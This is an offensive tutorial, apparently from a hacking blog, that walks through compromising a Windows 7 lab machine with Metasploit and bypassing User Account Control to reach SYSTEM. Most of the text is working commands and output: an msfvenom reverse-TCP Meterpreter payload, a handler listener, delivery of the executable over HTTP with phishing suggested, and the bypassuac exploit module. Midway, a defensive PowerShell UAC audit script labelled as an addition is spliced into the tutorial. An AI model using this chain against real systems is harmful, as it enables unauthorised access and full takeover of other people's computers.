UAC is something we have all dealt with on Windows, whether as a user, an administrator or an attacker. It is a core feature of the Windows security model, and most of the time it does its job. It can be frustrating for hackers trying to escalate their privileges, but it is easy enough to bypass UAC and get SYSTEM access with Metasploit.
In our demonstration we use Kali Linux to attack a Windows 7 box. If you have a Windows 7 practice machine you can follow along step by step, but the technique works against other versions of Windows as well. For it to work, however, the compromised user must be a member of the Administrators group on the target, so make sure that this is the case.
User Account Control Overview
User Account Control is a security feature of Windows that limits what a standard user can do until an administrator grants a temporary elevation of privilege. We have all dealt with the annoying pop-up window when trying to install software or run a particular program, but this feature helps keep malware at bay by requiring explicit consent before an application runs with higher privileges.
The feature was first introduced in Windows Vista and is still present in current Microsoft operating systems. It can be disabled, but a decent system administrator would never allow that. From an attacker's point of view it can be difficult to escalate privileges, because UAC blocks the escalation even when the compromised user is a member of the Administrators group.
Meterpreter has a built-in command to obtain SYSTEM, but it will not work while User Account Control is enabled. Luckily, there is a way around this: Metasploit makes it easy to bypass User Account Control, escalate privileges and obtain SYSTEM in just a few steps.
Step 1: compromise the target.
~# mkdir temp
~# cd temp/
The first thing we need to do is get a low-privilege shell on the target. For demonstration purposes we build a simple payload with MSFvenom and save it as an executable to be run on the target.
~/temp# msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.0.1 lport=1234 -f exe -o pwn.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: pwn.exe
The above command does the following:
- The -p flag specifies the payload.
- lhost is our local machine to connect back to.
- lport is the local port to connect back to.
- The -f flag determines the output format.
- The -o flag specifies the output file.
In order for our file to be of any use, we need to set up a listener to catch the connection as soon as the file is executed. Open a new tab or terminal window and start Metasploit with the msfconsole command. We can use the versatile multi/handler to catch our reverse shell.
~# msfconsole
msf5 > use exploit/multi/handler
All we have to do is set the options to match the executable we created earlier. Set the payload, lhost and lport as follows:
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.10.0.1
lhost => 10.10.0.1
msf5 exploit(multi/handler) > set lport 1234
lport => 1234
Type run and the handler will wait for incoming connections.
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.0.1:1234
Back in our working directory, we can start an HTTP server to host our file. All the victim has to do is connect to us, download the file and run it. In the real world this can be achieved in various ways, including social engineering or phishing attacks; we will keep it simple for now.
We could start Apache and serve the file from there, but there is a Python module named SimpleHTTPServer that is lightweight, easy to use and can be run from any directory without setup. Start it with the following command:
~/temp# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
Now the victim just needs to connect to our computer on port 8000 to retrieve the file. On the target, navigate to the IP address of the attacking computer and download the file.
Then simply save and run it.
If everything goes smoothly, a Meterpreter session should open on our handler.
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.0.1:1234
[*] Sending stage (206403 bytes) to 10.10.0.104
[*] Meterpreter session 1 opened (10.10.0.1:1234 -> 10.10.0.104:49224) at 2019-04-08 11:22:17 -0500
At this point we can stop the Python server, since we have successfully connected to the target.
Now that we have a Meterpreter session, we can see which user we are running as with the getuid command.
meterpreter > getuid
Server username: DLAB\admin2
The name is shown as "admin2", so there is a good chance this user has administrator rights. Let's try to escalate with the getsystem command.
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
And it fails. We can see that the command tries three methods to escalate privileges and returns an environment error. We can try each of these methods individually; use the -h flag to display the help for this command.
meterpreter > getsystem -h
Usage: getsystem [options]

Attempt to elevate your privilege to that of local system.

OPTIONS:

    -h        Help Banner.
    -t <opt>  The technique to use. (Default to '0').
                0 : All techniques available
                1 : Named Pipe Impersonation (In Memory/Admin)
                2 : Named Pipe Impersonation (Dropper/Admin)
                3 : Token Duplication (In Memory/Admin)
With the -t flag we can specify which technique to use. Let's try the first one:
meterpreter > getsystem -t 1
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
Now the error message reads "Access is denied". That may not look like progress, but it is: next we bypass User Account Control and get SYSTEM access.
We can use a Metasploit module to bypass the User Account Control feature on Windows, but first we must send the current session to the background. To do this, type background.
meterpreter > background
[*] Backgrounding session 1...
Use the search command in Metasploit to find a suitable exploit.
msf5 > search uac

Matching Modules
================

   #   Name                                                 Disclosure Date  Rank       Check  Description
   -   ----                                                 ---------------  ----       -----  -----------
   1   exploit/windows/local/ask                            2012-01-03       excellent  No     Windows Escalate UAC Execute RunAs
   2   exploit/windows/local/bypassuac                      2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass
   3   exploit/windows/local/bypassuac_comhijack            1900-01-01       excellent  Yes    Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
   4   exploit/windows/local/bypassuac_eventvwr             2016-08-15       excellent  Yes    Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
   5   exploit/windows/local/bypassuac_fodhelper            2017-05-12       excellent  Yes    Windows UAC Protection Bypass (Via FodHelper Registry Key)
   6   exploit/windows/local/bypassuac_injection            2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection)
   7   exploit/windows/local/bypassuac_injection_winsxs     2017-04-06       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS
   8   exploit/windows/local/bypassuac_sluihijack           2018-01-15       excellent  Yes    Windows UAC Protection Bypass (Via Slui File Handler Hijack)
   9   exploit/windows/local/bypassuac_vbs                  2015-08-22       excellent  No     Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)
   10  post/windows/gather/win_privs                                         normal     No     Windows Gather Privileges Enumeration
We want number two, the bypassuac exploit. Load the module with the use command.
msf5 > use exploit/windows/local/bypassuac
Check the options to see what we need.
msf5 exploit(windows/local/bypassuac) > options

Module options (exploit/windows/local/bypassuac):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   SESSION                     yes       The session to run this module on.
   TECHNIQUE  EXE              yes       Technique to use if UAC is turned off (Accepts: PSH, EXE)


Exploit target:

   Id  Name
   --  ----
   0   Windows x86
It looks like it needs the session we sent to the background earlier. Since we are attacking 64-bit Windows, we also need to set the target to 64-bit. Use the show targets command to display the available targets.
msf5 exploit(windows/local/bypassuac) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows x86
   1   Windows x64
Then set the target and session numbers.
msf5 exploit(windows/local/bypassuac) > set target 1
target => 1
msf5 exploit(windows/local/bypassuac) > set session 1
session => 1
We also need to specify a payload, so we use the trusty Meterpreter reverse TCP payload again.
msf5 exploit(windows/local/bypassuac) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/bypassuac) > set lhost 10.10.0.1
lhost => 10.10.0.1
msf5 exploit(windows/local/bypassuac) > set lport 1234
lport => 1234
Everything should be in order, so type run to launch the exploit.
msf5 exploit(windows/local/bypassuac) > run
[*] Started reverse TCP handler on 10.10.0.1:1234
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploaded the agent to the filesystem....
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 7168 bytes long being uploaded..
[*] Sending stage (206403 bytes) to 10.10.0.104
[*] Meterpreter session 2 opened (10.10.0.1:1234 -> 10.10.0.104:49235) at 2019-04-08 11:30:04 -0500
meterpreter >
The output shows the module checking the User Account Control level, confirming that the user is part of the Administrators group, and opening a new session. Let's run getuid again.
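The two preconditions the module reports above, that UAC is at its default level and that the account is in the Administrators group, are exactly what a defender should audit. The following PowerShell script is an added example and is not part of the original article or of Metasploit; it reads the documented UAC policy values under HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System and lists the local Administrators group. The "Windows default" and "Always notify" labels are the standard meanings of ConsentPromptBehaviorAdmin; the exit code convention is this script's own choice.

```powershell
# Added example (not from the original article): audit the UAC settings that a
# bypass module inspects before it runs. Works on Windows 7 (PowerShell 2.0) and later.

$policyPath = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$policy = Get-ItemProperty -Path $policyPath

# Missing values are treated as 0, which is how Windows treats an absent EnableLUA.
$enableLua      = [int]$policy.EnableLUA
$adminBehaviour = [int]$policy.ConsentPromptBehaviorAdmin
$secureDesktop  = [int]$policy.PromptOnSecureDesktop

# Documented meanings of ConsentPromptBehaviorAdmin.
$behaviours = @{
    0 = 'Elevate without prompting (UAC effectively off for administrators)'
    1 = 'Prompt for credentials on the secure desktop'
    2 = 'Prompt for consent on the secure desktop ("Always notify")'
    3 = 'Prompt for credentials'
    4 = 'Prompt for consent'
    5 = 'Prompt for consent for non-Windows binaries (Windows default)'
}

"EnableLUA                  : $enableLua"
"ConsentPromptBehaviorAdmin : $adminBehaviour ($($behaviours[$adminBehaviour]))"
"PromptOnSecureDesktop      : $secureDesktop"
""

# Exit code convention chosen for this script: 2 = UAC off, 1 = default level, 0 = always notify.
$exitCode = 0
if ($enableLua -ne 1) {
    Write-Warning 'UAC is disabled: every process of an administrator already runs with a full token.'
    $exitCode = 2
}
elseif ($adminBehaviour -eq 5) {
    Write-Warning 'UAC is at the Windows default level; this is the level the bypassuac module reports as "Default".'
    $exitCode = 1
}
elseif (($adminBehaviour -eq 1 -or $adminBehaviour -eq 2) -and $secureDesktop -eq 1) {
    'UAC is at "Always notify": every elevation requires a prompt on the secure desktop.'
}

# The second precondition: which accounts are members of the local Administrators group.
# Any of these accounts, once compromised, satisfies the "Part of Administrators group" check.
"Members of the local Administrators group:"
net localgroup Administrators | Select-Object -Skip 6 | Where-Object { $_ -and $_ -notmatch '^The command completed' }

exit $exitCode
```

Run it on the host being audited; a non-zero exit code flags a machine where a session as one of the listed accounts would meet the module's preconditions, which makes reducing Administrators group membership and raising the UAC level the two mitigations to act on.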
meterpreter > getuid
Server username: DLAB\admin2
We can see that we are still admin2; the exploit does not drop us into the SYSTEM account automatically. But now, when we run getsystem, we successfully bypass UAC and escalate privileges.
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
And now we can confirm that we finally have SYSTEM access.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Today we learned a little about User Account Control and how it protects Windows from unauthorized changes. We saw how to get an initial foothold on the target and tried to escalate privileges. When that did not work, we used a Metasploit module to get around the restriction and ultimately obtained system-level privileges on the target.